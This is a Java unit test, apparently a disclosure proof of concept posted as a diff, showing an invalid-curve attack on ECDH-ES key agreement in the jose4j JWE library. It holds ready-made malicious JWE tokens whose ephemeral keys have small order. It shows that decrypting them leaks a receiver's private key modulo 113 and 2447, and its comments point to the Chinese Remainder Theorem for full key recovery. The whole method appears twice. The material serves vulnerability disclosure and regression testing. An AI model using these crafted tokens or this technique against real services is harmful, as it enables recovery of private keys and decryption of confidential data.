asanso · February 9, 2017 18:55
diff --git a/jose4j.java b/jose4j.java
    public void testRecoverPrivateReceiverKey() throws JoseException {
        String alg = "ECDH-ES+A128KW";
        String enc = "A128CBC-HS256";
        JsonWebEncryption jwe = new JsonWebEncryption();
        
        String receiverJwkJson = "\n{\"kty\":\"EC\",\n" +
                " \"crv\":\"P-256\",\n" +
                " \"x\":\"weNJy2HscCSM6AEDTDg04biOvhFhyyWvOHQfeF_PxMQ\",\n" +
                " \"y\":\"e8lnCO-AlStT-NJVX-crhB7QRYhiix03illJOVAOyck\",\n" +
                " \"d\":\"VEmDZpDXXK8p8N0Cndsxs924q6nS1RXFASRl6BfUqdw\"\n" +
                "}";
        PublicJsonWebKey receiverJwk = PublicJsonWebKey.Factory.newPublicJwk(receiverJwkJson);
        
        ECPrivateKeyImpl privateKeyImpl = (ECPrivateKeyImpl) receiverJwk.getPrivateKey();
        BigInteger receiverPrivateKey = privateKeyImpl.getS();
        String plaintext = "Gambling is illegal at Bushwood sir, and I never slice.";
        
        //========================= attacking point #1 with order 113 ======================
        BigInteger attackerOrderGroup1 = new BigInteger("113");
        BigInteger receiverPrivateKeyModAttackerOrderGroup1 = receiverPrivateKey.mod(attackerOrderGroup1);

        log.info("The receiver private key is equal to {} mod {}",receiverPrivateKeyModAttackerOrderGroup1, attackerOrderGroup1);
        
        //The malicious JWE contains a public key with order 113
        String maliciousJWE1 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiZ1RsaTY1ZVRRN3otQmgxNDdmZjhLM203azJVaURpRzJMcFlrV0FhRkpDYyIsInkiOiJjTEFuakthNGJ6akQ3REpWUHdhOUVQclJ6TUc3ck9OZ3NpVUQta2YzMEZzIiwiY3J2IjoiUC0yNTYifX0.qGAdxtEnrV_3zbIxU2ZKrMWcejNltjA_dtefBFnRh9A2z9cNIqYRWg.pEA5kX304PMCOmFSKX_cEg.a9fwUrx2JXi1OnWEMOmZhXd94-bEGCH9xxRwqcGuG2AMo-AwHoljdsH5C_kcTqlXS5p51OB1tvgQcMwB5rpTxg.72CHiYFecyDvuUa43KKT6w";
 
        log.info("JWE w/ {} & {}: {}", alg, enc, maliciousJWE1);

        JsonWebEncryption receiverJwe1 = new JsonWebEncryption();
        receiverJwe1.setCompactSerialization(maliciousJWE1);
        receiverJwe1.setKey(receiverJwk.getPrivateKey());
        //this proof that receiverPrivateKey is equals 26 % 113
        assertEquals(plaintext, receiverJwe1.getPlaintextString());
        
        //========================= attacking point #2 with order 2447 ======================
        BigInteger attackerOrderGroup2 = new BigInteger("2447");
        BigInteger receiverPrivateKeyModAttackerOrderGroup2 = receiverPrivateKey.mod(attackerOrderGroup2);
        
        log.info("The receiver private key is equal to {} mod {}",receiverPrivateKeyModAttackerOrderGroup2, attackerOrderGroup2);
        
        //The malicious JWE contains a public key with order 2447
        String maliciousJWE2 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiWE9YR1E5XzZRQ3ZCZzN1OHZDSS1VZEJ2SUNBRWNOTkJyZnFkN3RHN29RNCIsInkiOiJoUW9XTm90bk56S2x3aUNuZUprTElxRG5UTnc3SXNkQkM1M1ZVcVZqVkpjIiwiY3J2IjoiUC0yNTYifX0.UGb3hX3ePAvtFB9TCdWsNkFTv9QWxSr3MpYNiSBdW630uRXRBT3sxw.6VpU84oMob16DxOR98YTRw.y1UslvtkoWdl9HpugfP0rSAkTw1xhm_LbK1iRXzGdpYqNwIG5VU33UBpKAtKFBoA1Kk_sYtfnHYAvn-aes4FTg.UZPN8h7FcvA5MIOq-Pkj8A";
        log.info("JWE w/ {} & {}: {}", alg, enc, maliciousJWE1);

        JsonWebEncryption receiverJwe2 = new JsonWebEncryption();
        receiverJwe2.setCompactSerialization(maliciousJWE2);
        receiverJwe2.setKey(receiverJwk.getPrivateKey());
        //this proof that receiverPrivateKey is equals 2446 % 2447
        assertEquals(plaintext, receiverJwe2.getPlaintextString());
        
        //THIS CAN BE DOIN MANY TIME 
        //....
        //AND THAN CHINESE REMAINDER THEOREM FTW
        
        
    }
	public void testRecoverPrivateReceiverKey() throws JoseException {
	String alg = "ECDH-ES+A128KW";
	String enc = "A128CBC-HS256";
	JsonWebEncryption jwe = new JsonWebEncryption();

	String receiverJwkJson = "\n{\"kty\":\"EC\",\n" +
	" \"crv\":\"P-256\",\n" +
	" \"x\":\"weNJy2HscCSM6AEDTDg04biOvhFhyyWvOHQfeF_PxMQ\",\n" +
	" \"y\":\"e8lnCO-AlStT-NJVX-crhB7QRYhiix03illJOVAOyck\",\n" +
	" \"d\":\"VEmDZpDXXK8p8N0Cndsxs924q6nS1RXFASRl6BfUqdw\"\n" +
	"}";
	PublicJsonWebKey receiverJwk = PublicJsonWebKey.Factory.newPublicJwk(receiverJwkJson);

	ECPrivateKeyImpl privateKeyImpl = (ECPrivateKeyImpl) receiverJwk.getPrivateKey();
	BigInteger receiverPrivateKey = privateKeyImpl.getS();
	String plaintext = "Gambling is illegal at Bushwood sir, and I never slice.";

	//========================= attacking point #1 with order 113 ======================
	BigInteger attackerOrderGroup1 = new BigInteger("113");
	BigInteger receiverPrivateKeyModAttackerOrderGroup1 = receiverPrivateKey.mod(attackerOrderGroup1);

	log.info("The receiver private key is equal to {} mod {}",receiverPrivateKeyModAttackerOrderGroup1, attackerOrderGroup1);

	//The malicious JWE contains a public key with order 113
	String maliciousJWE1 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiZ1RsaTY1ZVRRN3otQmgxNDdmZjhLM203azJVaURpRzJMcFlrV0FhRkpDYyIsInkiOiJjTEFuakthNGJ6akQ3REpWUHdhOUVQclJ6TUc3ck9OZ3NpVUQta2YzMEZzIiwiY3J2IjoiUC0yNTYifX0.qGAdxtEnrV_3zbIxU2ZKrMWcejNltjA_dtefBFnRh9A2z9cNIqYRWg.pEA5kX304PMCOmFSKX_cEg.a9fwUrx2JXi1OnWEMOmZhXd94-bEGCH9xxRwqcGuG2AMo-AwHoljdsH5C_kcTqlXS5p51OB1tvgQcMwB5rpTxg.72CHiYFecyDvuUa43KKT6w";

	log.info("JWE w/ {} & {}: {}", alg, enc, maliciousJWE1);

	JsonWebEncryption receiverJwe1 = new JsonWebEncryption();
	receiverJwe1.setCompactSerialization(maliciousJWE1);
	receiverJwe1.setKey(receiverJwk.getPrivateKey());
	//this proof that receiverPrivateKey is equals 26 % 113
	assertEquals(plaintext, receiverJwe1.getPlaintextString());

	//========================= attacking point #2 with order 2447 ======================
	BigInteger attackerOrderGroup2 = new BigInteger("2447");
	BigInteger receiverPrivateKeyModAttackerOrderGroup2 = receiverPrivateKey.mod(attackerOrderGroup2);

	log.info("The receiver private key is equal to {} mod {}",receiverPrivateKeyModAttackerOrderGroup2, attackerOrderGroup2);

	//The malicious JWE contains a public key with order 2447
	String maliciousJWE2 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiWE9YR1E5XzZRQ3ZCZzN1OHZDSS1VZEJ2SUNBRWNOTkJyZnFkN3RHN29RNCIsInkiOiJoUW9XTm90bk56S2x3aUNuZUprTElxRG5UTnc3SXNkQkM1M1ZVcVZqVkpjIiwiY3J2IjoiUC0yNTYifX0.UGb3hX3ePAvtFB9TCdWsNkFTv9QWxSr3MpYNiSBdW630uRXRBT3sxw.6VpU84oMob16DxOR98YTRw.y1UslvtkoWdl9HpugfP0rSAkTw1xhm_LbK1iRXzGdpYqNwIG5VU33UBpKAtKFBoA1Kk_sYtfnHYAvn-aes4FTg.UZPN8h7FcvA5MIOq-Pkj8A";
	log.info("JWE w/ {} & {}: {}", alg, enc, maliciousJWE1);

	JsonWebEncryption receiverJwe2 = new JsonWebEncryption();
	receiverJwe2.setCompactSerialization(maliciousJWE2);
	receiverJwe2.setKey(receiverJwk.getPrivateKey());
	//this proof that receiverPrivateKey is equals 2446 % 2447
	assertEquals(plaintext, receiverJwe2.getPlaintextString());

	//THIS CAN BE DOIN MANY TIME
	//....
	//AND THAN CHINESE REMAINDER THEOREM FTW


	}